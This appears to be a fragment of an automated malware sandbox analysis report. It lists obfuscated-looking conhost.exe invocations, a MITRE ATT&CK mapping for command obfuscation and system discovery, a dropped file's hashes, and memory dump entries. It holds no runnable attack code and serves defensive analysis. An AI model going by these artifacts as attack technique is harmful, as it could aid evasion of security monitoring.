\??\C:\Windows\system32\conhost.exe "1675979687494410321638568649-15322460691128325893351511131618271599-443970732"
1⤵
PID:11652

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "11876189631181528300-1832115811638004069-1348936860139985835-20827419931713269336"
1⤵
PID:11420

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1013042244231936280869679694126717377815505154211835910380-470900873488558162"
1⤵
PID:2776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PS7KC0P5RB2SP4XVN6NK.temp

Filesize
7KB

MD5
556c01c587f3d6c09ac57d1df67105ad

SHA1
16d7fb407f3b7b57bb2bfc686c68d9a026ff5ed0

SHA256
74f1a3936582b2c46741bc3e310f24aa39e6350335b021b92a000e2897057209

SHA512
f230be106e5a56495d68212038626bb4c3c15f50fa9bb7af23314adc6a94ea151a48a2fe8f4217a71654ac0ee36f8cc4c084f68ba657dac27e732caf38c687b3

Download Submit
memory/2236-340-0x0000000077400000-0x000000007751F000-memory.dmp

Filesize
1.1MB

Download
memory/2236-342-0x0000000003030000-0x0000000003C7A000-memory.dmp

Filesize
12.3MB

Download
memory/2236-341-0x0000000077520000-0x000000007761A000-memory.dmp

Filesize
1000KB

Download